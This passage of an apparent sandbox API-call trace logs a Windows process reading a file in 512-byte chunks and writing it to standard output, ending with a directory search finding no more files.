out: lpBuffer=0x2cf250*, lpNumberOfBytesWritten=0x2ce434*=0x50, lpOverlapped=0x0) returned 1 [0152.185] _get_osfhandle (_FileHandle=1) returned 0x4c [0152.185] GetFileType (hFile=0x4c) returned 0x1 [0152.185] _get_osfhandle (_FileHandle=1) returned 0x4c [0152.185] WriteFile (in: hFile=0x4c, lpBuffer=0x2cf2a0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce434, lpOverlapped=0x0 | out: lpBuffer=0x2cf2a0*, lpNumberOfBytesWritten=0x2ce434*=0x50, lpOverlapped=0x0) returned 1 [0152.185] _get_osfhandle (_FileHandle=1) returned 0x4c [0152.185] GetFileType (hFile=0x4c) returned 0x1 [0152.185] _get_osfhandle (_FileHandle=1) returned 0x4c [0152.185] WriteFile (in: hFile=0x4c, lpBuffer=0x2cf2f0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce434, lpOverlapped=0x0 | out: lpBuffer=0x2cf2f0*, lpNumberOfBytesWritten=0x2ce434*=0x50, lpOverlapped=0x0) returned 1 [0152.185] _get_osfhandle (_FileHandle=1) returned 0x4c [0152.185] GetFileType (hFile=0x4c) returned 0x1 [0152.185] _get_osfhandle (_FileHandle=1) returned 0x4c [0152.185] WriteFile (in: hFile=0x4c, lpBuffer=0x2cf340*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce434, lpOverlapped=0x0 | out: lpBuffer=0x2cf340*, lpNumberOfBytesWritten=0x2ce434*=0x50, lpOverlapped=0x0) returned 1 [0152.185] _get_osfhandle (_FileHandle=1) returned 0x4c [0152.185] GetFileType (hFile=0x4c) returned 0x1 [0152.185] _get_osfhandle (_FileHandle=1) returned 0x4c [0152.185] WriteFile (in: hFile=0x4c, lpBuffer=0x2cf390*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce434, lpOverlapped=0x0 | out: lpBuffer=0x2cf390*, lpNumberOfBytesWritten=0x2ce434*=0x50, lpOverlapped=0x0) returned 1 [0152.185] _get_osfhandle (_FileHandle=1) returned 0x4c [0152.185] GetFileType (hFile=0x4c) returned 0x1 [0152.185] _get_osfhandle (_FileHandle=1) returned 0x4c [0152.185] WriteFile (in: hFile=0x4c, lpBuffer=0x2cf3e0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce434, lpOverlapped=0x0 | out: lpBuffer=0x2cf3e0*, 
lpNumberOfBytesWritten=0x2ce434*=0x50, lpOverlapped=0x0) returned 1 [0152.185] _get_osfhandle (_FileHandle=1) returned 0x4c [0152.185] GetFileType (hFile=0x4c) returned 0x1 [0152.185] _get_osfhandle (_FileHandle=1) returned 0x4c [0152.186] WriteFile (in: hFile=0x4c, lpBuffer=0x2cf430*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2ce434, lpOverlapped=0x0 | out: lpBuffer=0x2cf430*, lpNumberOfBytesWritten=0x2ce434*=0x20, lpOverlapped=0x0) returned 1 [0152.186] _get_osfhandle (_FileHandle=4) returned 0x54 [0152.186] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2ce420 | out: lpNewFilePointer=0x0) returned 1 [0152.186] _get_osfhandle (_FileHandle=4) returned 0x54 [0152.186] ReadFile (in: hFile=0x54, lpBuffer=0x2cf250, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ce440, lpOverlapped=0x0 | out: lpBuffer=0x2cf250*, lpNumberOfBytesRead=0x2ce440*=0x200, lpOverlapped=0x0) returned 1 [0152.186] _get_osfhandle (_FileHandle=1) returned 0x4c [0152.186] GetFileType (hFile=0x4c) returned 0x1 [0152.186] _get_osfhandle (_FileHandle=1) returned 0x4c [0152.186] GetFileType (hFile=0x4c) returned 0x1 [0152.186] _get_osfhandle (_FileHandle=1) returned 0x4c [0152.186] WriteFile (in: hFile=0x4c, lpBuffer=0x2cf250*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce434, lpOverlapped=0x0 | out: lpBuffer=0x2cf250*, lpNumberOfBytesWritten=0x2ce434*=0x50, lpOverlapped=0x0) returned 1 [0152.186] _get_osfhandle (_FileHandle=1) returned 0x4c [0152.186] GetFileType (hFile=0x4c) returned 0x1 [0152.186] _get_osfhandle (_FileHandle=1) returned 0x4c [0152.186] WriteFile (in: hFile=0x4c, lpBuffer=0x2cf2a0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce434, lpOverlapped=0x0 | out: lpBuffer=0x2cf2a0*, lpNumberOfBytesWritten=0x2ce434*=0x50, lpOverlapped=0x0) returned 1 [0152.186] _get_osfhandle (_FileHandle=1) returned 0x4c [0152.186] GetFileType (hFile=0x4c) returned 0x1 [0152.186] _get_osfhandle (_FileHandle=1) returned 0x4c 
[0152.186] WriteFile (in: hFile=0x4c, lpBuffer=0x2cf2f0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce434, lpOverlapped=0x0 | out: lpBuffer=0x2cf2f0*, lpNumberOfBytesWritten=0x2ce434*=0x50, lpOverlapped=0x0) returned 1 [0152.186] _get_osfhandle (_FileHandle=1) returned 0x4c [0152.186] GetFileType (hFile=0x4c) returned 0x1 [0152.186] _get_osfhandle (_FileHandle=1) returned 0x4c [0152.186] WriteFile (in: hFile=0x4c, lpBuffer=0x2cf340*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce434, lpOverlapped=0x0 | out: lpBuffer=0x2cf340*, lpNumberOfBytesWritten=0x2ce434*=0x50, lpOverlapped=0x0) returned 1 [0152.186] _get_osfhandle (_FileHandle=1) returned 0x4c [0152.186] GetFileType (hFile=0x4c) returned 0x1 [0152.187] _get_osfhandle (_FileHandle=1) returned 0x4c [0152.187] WriteFile (in: hFile=0x4c, lpBuffer=0x2cf390*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce434, lpOverlapped=0x0 | out: lpBuffer=0x2cf390*, lpNumberOfBytesWritten=0x2ce434*=0x50, lpOverlapped=0x0) returned 1 [0152.187] _get_osfhandle (_FileHandle=1) returned 0x4c [0152.187] GetFileType (hFile=0x4c) returned 0x1 [0152.187] _get_osfhandle (_FileHandle=1) returned 0x4c [0152.187] WriteFile (in: hFile=0x4c, lpBuffer=0x2cf3e0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce434, lpOverlapped=0x0 | out: lpBuffer=0x2cf3e0*, lpNumberOfBytesWritten=0x2ce434*=0x50, lpOverlapped=0x0) returned 1 [0152.187] _get_osfhandle (_FileHandle=1) returned 0x4c [0152.187] GetFileType (hFile=0x4c) returned 0x1 [0152.187] _get_osfhandle (_FileHandle=1) returned 0x4c [0152.187] WriteFile (in: hFile=0x4c, lpBuffer=0x2cf430*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2ce434, lpOverlapped=0x0 | out: lpBuffer=0x2cf430*, lpNumberOfBytesWritten=0x2ce434*=0x20, lpOverlapped=0x0) returned 1 [0152.187] _get_osfhandle (_FileHandle=4) returned 0x54 [0152.187] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2ce420 | out: lpNewFilePointer=0x0) 
returned 1 [0152.187] _get_osfhandle (_FileHandle=4) returned 0x54 [0152.187] ReadFile (in: hFile=0x54, lpBuffer=0x2cf250, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ce440, lpOverlapped=0x0 | out: lpBuffer=0x2cf250*, lpNumberOfBytesRead=0x2ce440*=0x200, lpOverlapped=0x0) returned 1 [0152.187] _get_osfhandle (_FileHandle=1) returned 0x4c [0152.187] GetFileType (hFile=0x4c) returned 0x1 [0152.187] _get_osfhandle (_FileHandle=1) returned 0x4c [0152.187] GetFileType (hFile=0x4c) returned 0x1 [0152.187] _get_osfhandle (_FileHandle=1) returned 0x4c [0152.187] WriteFile (in: hFile=0x4c, lpBuffer=0x2cf250*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce434, lpOverlapped=0x0 | out: lpBuffer=0x2cf250*, lpNumberOfBytesWritten=0x2ce434*=0x50, lpOverlapped=0x0) returned 1 [0152.187] _get_osfhandle (_FileHandle=1) returned 0x4c [0152.187] GetFileType (hFile=0x4c) returned 0x1 [0152.187] _get_osfhandle (_FileHandle=1) returned 0x4c [0152.187] WriteFile (in: hFile=0x4c, lpBuffer=0x2cf2a0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce434, lpOverlapped=0x0 | out: lpBuffer=0x2cf2a0*, lpNumberOfBytesWritten=0x2ce434*=0x50, lpOverlapped=0x0) returned 1 [0152.187] _get_osfhandle (_FileHandle=1) returned 0x4c [0152.187] GetFileType (hFile=0x4c) returned 0x1 [0152.188] _get_osfhandle (_FileHandle=1) returned 0x4c [0152.188] WriteFile (in: hFile=0x4c, lpBuffer=0x2cf2f0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce434, lpOverlapped=0x0 | out: lpBuffer=0x2cf2f0*, lpNumberOfBytesWritten=0x2ce434*=0x50, lpOverlapped=0x0) returned 1 [0152.188] _get_osfhandle (_FileHandle=1) returned 0x4c [0152.188] GetFileType (hFile=0x4c) returned 0x1 [0152.188] _get_osfhandle (_FileHandle=1) returned 0x4c [0152.188] WriteFile (in: hFile=0x4c, lpBuffer=0x2cf340*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce434, lpOverlapped=0x0 | out: lpBuffer=0x2cf340*, lpNumberOfBytesWritten=0x2ce434*=0x50, lpOverlapped=0x0) returned 1 [0152.188] _get_osfhandle 
(_FileHandle=1) returned 0x4c [0152.188] GetFileType (hFile=0x4c) returned 0x1 [0152.188] _get_osfhandle (_FileHandle=1) returned 0x4c [0152.188] WriteFile (in: hFile=0x4c, lpBuffer=0x2cf390*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce434, lpOverlapped=0x0 | out: lpBuffer=0x2cf390*, lpNumberOfBytesWritten=0x2ce434*=0x50, lpOverlapped=0x0) returned 1 [0152.188] _get_osfhandle (_FileHandle=1) returned 0x4c [0152.188] GetFileType (hFile=0x4c) returned 0x1 [0152.188] _get_osfhandle (_FileHandle=1) returned 0x4c [0152.188] WriteFile (in: hFile=0x4c, lpBuffer=0x2cf3e0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce434, lpOverlapped=0x0 | out: lpBuffer=0x2cf3e0*, lpNumberOfBytesWritten=0x2ce434*=0x50, lpOverlapped=0x0) returned 1 [0152.188] _get_osfhandle (_FileHandle=1) returned 0x4c [0152.188] GetFileType (hFile=0x4c) returned 0x1 [0152.188] _get_osfhandle (_FileHandle=1) returned 0x4c [0152.188] WriteFile (in: hFile=0x4c, lpBuffer=0x2cf430*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2ce434, lpOverlapped=0x0 | out: lpBuffer=0x2cf430*, lpNumberOfBytesWritten=0x2ce434*=0x20, lpOverlapped=0x0) returned 1 [0152.188] _get_osfhandle (_FileHandle=4) returned 0x54 [0152.188] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2ce420 | out: lpNewFilePointer=0x0) returned 1 [0152.188] _get_osfhandle (_FileHandle=4) returned 0x54 [0152.188] ReadFile (in: hFile=0x54, lpBuffer=0x2cf250, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ce440, lpOverlapped=0x0 | out: lpBuffer=0x2cf250*, lpNumberOfBytesRead=0x2ce440*=0x200, lpOverlapped=0x0) returned 1 [0152.188] _get_osfhandle (_FileHandle=1) returned 0x4c [0152.189] GetFileType (hFile=0x4c) returned 0x1 [0152.189] _get_osfhandle (_FileHandle=1) returned 0x4c [0152.189] GetFileType (hFile=0x4c) returned 0x1 [0152.189] _get_osfhandle (_FileHandle=1) returned 0x4c [0152.189] WriteFile (in: hFile=0x4c, lpBuffer=0x2cf250*, nNumberOfBytesToWrite=0x50, 
lpNumberOfBytesWritten=0x2ce434, lpOverlapped=0x0 | out: lpBuffer=0x2cf250*, lpNumberOfBytesWritten=0x2ce434*=0x50, lpOverlapped=0x0) returned 1 [0152.189] _get_osfhandle (_FileHandle=1) returned 0x4c [0152.189] GetFileType (hFile=0x4c) returned 0x1 [0152.189] _get_osfhandle (_FileHandle=1) returned 0x4c [0152.189] WriteFile (in: hFile=0x4c, lpBuffer=0x2cf2a0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce434, lpOverlapped=0x0 | out: lpBuffer=0x2cf2a0*, lpNumberOfBytesWritten=0x2ce434*=0x50, lpOverlapped=0x0) returned 1 [0152.189] _get_osfhandle (_FileHandle=1) returned 0x4c [0152.189] GetFileType (hFile=0x4c) returned 0x1 [0152.189] _get_osfhandle (_FileHandle=1) returned 0x4c [0152.189] WriteFile (in: hFile=0x4c, lpBuffer=0x2cf2f0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce434, lpOverlapped=0x0 | out: lpBuffer=0x2cf2f0*, lpNumberOfBytesWritten=0x2ce434*=0x50, lpOverlapped=0x0) returned 1 [0152.189] _get_osfhandle (_FileHandle=1) returned 0x4c [0152.189] GetFileType (hFile=0x4c) returned 0x1 [0152.189] _get_osfhandle (_FileHandle=1) returned 0x4c [0152.189] WriteFile (in: hFile=0x4c, lpBuffer=0x2cf340*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce434, lpOverlapped=0x0 | out: lpBuffer=0x2cf340*, lpNumberOfBytesWritten=0x2ce434*=0x50, lpOverlapped=0x0) returned 1 [0152.189] _get_osfhandle (_FileHandle=1) returned 0x4c [0152.189] GetFileType (hFile=0x4c) returned 0x1 [0152.189] _get_osfhandle (_FileHandle=1) returned 0x4c [0152.189] WriteFile (in: hFile=0x4c, lpBuffer=0x2cf390*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce434, lpOverlapped=0x0 | out: lpBuffer=0x2cf390*, lpNumberOfBytesWritten=0x2ce434*=0x50, lpOverlapped=0x0) returned 1 [0152.189] _get_osfhandle (_FileHandle=1) returned 0x4c [0152.189] GetFileType (hFile=0x4c) returned 0x1 [0152.189] _get_osfhandle (_FileHandle=1) returned 0x4c [0152.189] WriteFile (in: hFile=0x4c, lpBuffer=0x2cf3e0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce434, 
lpOverlapped=0x0 | out: lpBuffer=0x2cf3e0*, lpNumberOfBytesWritten=0x2ce434*=0x50, lpOverlapped=0x0) returned 1 [0152.190] _get_osfhandle (_FileHandle=1) returned 0x4c [0152.190] GetFileType (hFile=0x4c) returned 0x1 [0152.190] _get_osfhandle (_FileHandle=1) returned 0x4c [0152.190] WriteFile (in: hFile=0x4c, lpBuffer=0x2cf430*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2ce434, lpOverlapped=0x0 | out: lpBuffer=0x2cf430*, lpNumberOfBytesWritten=0x2ce434*=0x20, lpOverlapped=0x0) returned 1 [0152.190] _get_osfhandle (_FileHandle=4) returned 0x54 [0152.190] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2ce420 | out: lpNewFilePointer=0x0) returned 1 [0152.190] _get_osfhandle (_FileHandle=4) returned 0x54 [0152.190] ReadFile (in: hFile=0x54, lpBuffer=0x2cf250, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ce440, lpOverlapped=0x0 | out: lpBuffer=0x2cf250*, lpNumberOfBytesRead=0x2ce440*=0x200, lpOverlapped=0x0) returned 1 [0152.190] _get_osfhandle (_FileHandle=1) returned 0x4c [0152.190] GetFileType (hFile=0x4c) returned 0x1 [0152.190] _get_osfhandle (_FileHandle=1) returned 0x4c [0152.190] GetFileType (hFile=0x4c) returned 0x1 [0152.190] _get_osfhandle (_FileHandle=1) returned 0x4c [0152.190] WriteFile (in: hFile=0x4c, lpBuffer=0x2cf250*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce434, lpOverlapped=0x0 | out: lpBuffer=0x2cf250*, lpNumberOfBytesWritten=0x2ce434*=0x50, lpOverlapped=0x0) returned 1 [0152.190] _get_osfhandle (_FileHandle=1) returned 0x4c [0152.190] GetFileType (hFile=0x4c) returned 0x1 [0152.190] _get_osfhandle (_FileHandle=1) returned 0x4c [0152.190] WriteFile (in: hFile=0x4c, lpBuffer=0x2cf2a0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce434, lpOverlapped=0x0 | out: lpBuffer=0x2cf2a0*, lpNumberOfBytesWritten=0x2ce434*=0x50, lpOverlapped=0x0) returned 1 [0152.190] _get_osfhandle (_FileHandle=1) returned 0x4c [0152.190] GetFileType (hFile=0x4c) returned 0x1 [0152.190] 
_get_osfhandle (_FileHandle=1) returned 0x4c [0152.191] WriteFile (in: hFile=0x4c, lpBuffer=0x2cf2f0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce434, lpOverlapped=0x0 | out: lpBuffer=0x2cf2f0*, lpNumberOfBytesWritten=0x2ce434*=0x50, lpOverlapped=0x0) returned 1 [0152.191] _get_osfhandle (_FileHandle=1) returned 0x4c [0152.191] GetFileType (hFile=0x4c) returned 0x1 [0152.191] _get_osfhandle (_FileHandle=1) returned 0x4c [0152.191] WriteFile (in: hFile=0x4c, lpBuffer=0x2cf340*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce434, lpOverlapped=0x0 | out: lpBuffer=0x2cf340*, lpNumberOfBytesWritten=0x2ce434*=0x50, lpOverlapped=0x0) returned 1 [0152.191] _get_osfhandle (_FileHandle=1) returned 0x4c [0152.191] GetFileType (hFile=0x4c) returned 0x1 [0152.191] _get_osfhandle (_FileHandle=1) returned 0x4c [0152.191] WriteFile (in: hFile=0x4c, lpBuffer=0x2cf390*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce434, lpOverlapped=0x0 | out: lpBuffer=0x2cf390*, lpNumberOfBytesWritten=0x2ce434*=0x50, lpOverlapped=0x0) returned 1 [0152.191] _get_osfhandle (_FileHandle=1) returned 0x4c [0152.191] GetFileType (hFile=0x4c) returned 0x1 [0152.191] _get_osfhandle (_FileHandle=1) returned 0x4c [0152.191] WriteFile (in: hFile=0x4c, lpBuffer=0x2cf3e0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce434, lpOverlapped=0x0 | out: lpBuffer=0x2cf3e0*, lpNumberOfBytesWritten=0x2ce434*=0x50, lpOverlapped=0x0) returned 1 [0152.191] _get_osfhandle (_FileHandle=1) returned 0x4c [0152.191] GetFileType (hFile=0x4c) returned 0x1 [0152.191] _get_osfhandle (_FileHandle=1) returned 0x4c [0152.191] WriteFile (in: hFile=0x4c, lpBuffer=0x2cf430*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2ce434, lpOverlapped=0x0 | out: lpBuffer=0x2cf430*, lpNumberOfBytesWritten=0x2ce434*=0x20, lpOverlapped=0x0) returned 1 [0152.191] _get_osfhandle (_FileHandle=4) returned 0x54 [0152.191] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, 
dwMoveMethod=0x2ce420 | out: lpNewFilePointer=0x0) returned 1 [0152.191] _get_osfhandle (_FileHandle=4) returned 0x54 [0152.191] ReadFile (in: hFile=0x54, lpBuffer=0x2cf250, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ce440, lpOverlapped=0x0 | out: lpBuffer=0x2cf250*, lpNumberOfBytesRead=0x2ce440*=0x200, lpOverlapped=0x0) returned 1 [0152.191] _get_osfhandle (_FileHandle=1) returned 0x4c [0152.191] GetFileType (hFile=0x4c) returned 0x1 [0152.191] _get_osfhandle (_FileHandle=1) returned 0x4c [0152.191] GetFileType (hFile=0x4c) returned 0x1 [0152.192] _get_osfhandle (_FileHandle=1) returned 0x4c [0152.192] WriteFile (in: hFile=0x4c, lpBuffer=0x2cf250*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce434, lpOverlapped=0x0 | out: lpBuffer=0x2cf250*, lpNumberOfBytesWritten=0x2ce434*=0x50, lpOverlapped=0x0) returned 1 [0152.192] _get_osfhandle (_FileHandle=1) returned 0x4c [0152.192] GetFileType (hFile=0x4c) returned 0x1 [0152.192] _get_osfhandle (_FileHandle=1) returned 0x4c [0152.192] WriteFile (in: hFile=0x4c, lpBuffer=0x2cf2a0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce434, lpOverlapped=0x0 | out: lpBuffer=0x2cf2a0*, lpNumberOfBytesWritten=0x2ce434*=0x50, lpOverlapped=0x0) returned 1 [0152.192] _get_osfhandle (_FileHandle=1) returned 0x4c [0152.192] GetFileType (hFile=0x4c) returned 0x1 [0152.192] _get_osfhandle (_FileHandle=1) returned 0x4c [0152.192] WriteFile (in: hFile=0x4c, lpBuffer=0x2cf2f0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce434, lpOverlapped=0x0 | out: lpBuffer=0x2cf2f0*, lpNumberOfBytesWritten=0x2ce434*=0x50, lpOverlapped=0x0) returned 1 [0152.192] _get_osfhandle (_FileHandle=1) returned 0x4c [0152.192] GetFileType (hFile=0x4c) returned 0x1 [0152.192] _get_osfhandle (_FileHandle=1) returned 0x4c [0152.192] WriteFile (in: hFile=0x4c, lpBuffer=0x2cf340*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce434, lpOverlapped=0x0 | out: lpBuffer=0x2cf340*, lpNumberOfBytesWritten=0x2ce434*=0x50, 
lpOverlapped=0x0) returned 1 [0152.192] _get_osfhandle (_FileHandle=1) returned 0x4c [0152.192] GetFileType (hFile=0x4c) returned 0x1 [0152.192] _get_osfhandle (_FileHandle=1) returned 0x4c [0152.192] WriteFile (in: hFile=0x4c, lpBuffer=0x2cf390*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce434, lpOverlapped=0x0 | out: lpBuffer=0x2cf390*, lpNumberOfBytesWritten=0x2ce434*=0x50, lpOverlapped=0x0) returned 1 [0152.192] _get_osfhandle (_FileHandle=1) returned 0x4c [0152.192] GetFileType (hFile=0x4c) returned 0x1 [0152.192] _get_osfhandle (_FileHandle=1) returned 0x4c [0152.192] WriteFile (in: hFile=0x4c, lpBuffer=0x2cf3e0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce434, lpOverlapped=0x0 | out: lpBuffer=0x2cf3e0*, lpNumberOfBytesWritten=0x2ce434*=0x50, lpOverlapped=0x0) returned 1 [0152.192] _get_osfhandle (_FileHandle=1) returned 0x4c [0152.192] GetFileType (hFile=0x4c) returned 0x1 [0152.192] _get_osfhandle (_FileHandle=1) returned 0x4c [0152.193] WriteFile (in: hFile=0x4c, lpBuffer=0x2cf430*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2ce434, lpOverlapped=0x0 | out: lpBuffer=0x2cf430*, lpNumberOfBytesWritten=0x2ce434*=0x20, lpOverlapped=0x0) returned 1 [0152.193] _get_osfhandle (_FileHandle=4) returned 0x54 [0152.193] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2ce420 | out: lpNewFilePointer=0x0) returned 1 [0152.193] _get_osfhandle (_FileHandle=4) returned 0x54 [0152.193] ReadFile (in: hFile=0x54, lpBuffer=0x2cf250, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ce440, lpOverlapped=0x0 | out: lpBuffer=0x2cf250*, lpNumberOfBytesRead=0x2ce440*=0x200, lpOverlapped=0x0) returned 1 [0152.193] _get_osfhandle (_FileHandle=1) returned 0x4c [0152.193] GetFileType (hFile=0x4c) returned 0x1 [0152.193] _get_osfhandle (_FileHandle=1) returned 0x4c [0152.193] GetFileType (hFile=0x4c) returned 0x1 [0152.193] _get_osfhandle (_FileHandle=1) returned 0x4c [0152.193] WriteFile (in: hFile=0x4c, 
lpBuffer=0x2cf250*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce434, lpOverlapped=0x0 | out: lpBuffer=0x2cf250*, lpNumberOfBytesWritten=0x2ce434*=0x50, lpOverlapped=0x0) returned 1 [0152.193] _get_osfhandle (_FileHandle=1) returned 0x4c [0152.193] GetFileType (hFile=0x4c) returned 0x1 [0152.193] _get_osfhandle (_FileHandle=1) returned 0x4c [0152.193] WriteFile (in: hFile=0x4c, lpBuffer=0x2cf2a0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce434, lpOverlapped=0x0 | out: lpBuffer=0x2cf2a0*, lpNumberOfBytesWritten=0x2ce434*=0x50, lpOverlapped=0x0) returned 1 [0152.193] _get_osfhandle (_FileHandle=1) returned 0x4c [0152.193] GetFileType (hFile=0x4c) returned 0x1 [0152.193] _get_osfhandle (_FileHandle=1) returned 0x4c [0152.193] WriteFile (in: hFile=0x4c, lpBuffer=0x2cf2f0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce434, lpOverlapped=0x0 | out: lpBuffer=0x2cf2f0*, lpNumberOfBytesWritten=0x2ce434*=0x50, lpOverlapped=0x0) returned 1 [0152.193] _get_osfhandle (_FileHandle=1) returned 0x4c [0152.193] GetFileType (hFile=0x4c) returned 0x1 [0152.193] _get_osfhandle (_FileHandle=1) returned 0x4c [0152.193] WriteFile (in: hFile=0x4c, lpBuffer=0x2cf340*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce434, lpOverlapped=0x0 | out: lpBuffer=0x2cf340*, lpNumberOfBytesWritten=0x2ce434*=0x50, lpOverlapped=0x0) returned 1 [0152.193] _get_osfhandle (_FileHandle=1) returned 0x4c [0152.193] GetFileType (hFile=0x4c) returned 0x1 [0152.193] _get_osfhandle (_FileHandle=1) returned 0x4c [0152.194] WriteFile (in: hFile=0x4c, lpBuffer=0x2cf390*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce434, lpOverlapped=0x0 | out: lpBuffer=0x2cf390*, lpNumberOfBytesWritten=0x2ce434*=0x50, lpOverlapped=0x0) returned 1 [0152.194] _get_osfhandle (_FileHandle=1) returned 0x4c [0152.194] GetFileType (hFile=0x4c) returned 0x1 [0152.194] _get_osfhandle (_FileHandle=1) returned 0x4c [0152.194] WriteFile (in: hFile=0x4c, lpBuffer=0x2cf3e0*, 
nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce434, lpOverlapped=0x0 | out: lpBuffer=0x2cf3e0*, lpNumberOfBytesWritten=0x2ce434*=0x50, lpOverlapped=0x0) returned 1 [0152.194] _get_osfhandle (_FileHandle=1) returned 0x4c [0152.194] GetFileType (hFile=0x4c) returned 0x1 [0152.194] _get_osfhandle (_FileHandle=1) returned 0x4c [0152.194] WriteFile (in: hFile=0x4c, lpBuffer=0x2cf430*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2ce434, lpOverlapped=0x0 | out: lpBuffer=0x2cf430*, lpNumberOfBytesWritten=0x2ce434*=0x20, lpOverlapped=0x0) returned 1 [0152.194] _get_osfhandle (_FileHandle=4) returned 0x54 [0152.194] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2ce420 | out: lpNewFilePointer=0x0) returned 1 [0152.194] _get_osfhandle (_FileHandle=4) returned 0x54 [0152.194] ReadFile (in: hFile=0x54, lpBuffer=0x2cf250, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ce440, lpOverlapped=0x0 | out: lpBuffer=0x2cf250*, lpNumberOfBytesRead=0x2ce440*=0x32, lpOverlapped=0x0) returned 1 [0152.194] _get_osfhandle (_FileHandle=1) returned 0x4c [0152.194] GetFileType (hFile=0x4c) returned 0x1 [0152.194] _get_osfhandle (_FileHandle=1) returned 0x4c [0152.194] GetFileType (hFile=0x4c) returned 0x1 [0152.194] _get_osfhandle (_FileHandle=1) returned 0x4c [0152.194] WriteFile (in: hFile=0x4c, lpBuffer=0x2cf250*, nNumberOfBytesToWrite=0x32, lpNumberOfBytesWritten=0x2ce434, lpOverlapped=0x0 | out: lpBuffer=0x2cf250*, lpNumberOfBytesWritten=0x2ce434*=0x32, lpOverlapped=0x0) returned 1 [0152.194] _get_osfhandle (_FileHandle=4) returned 0x54 [0152.194] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2ce420 | out: lpNewFilePointer=0x0) returned 1 [0152.194] _close (_FileHandle=4) returned 0 [0152.195] FindNextFileW (in: hFindFile=0x460eb0, lpFindFileData=0x2cf4b4 | out: lpFindFileData=0x2cf4b4) returned 0 [0152.195] GetLastError () returned 0x12 [0152.195] FindClose (in: 
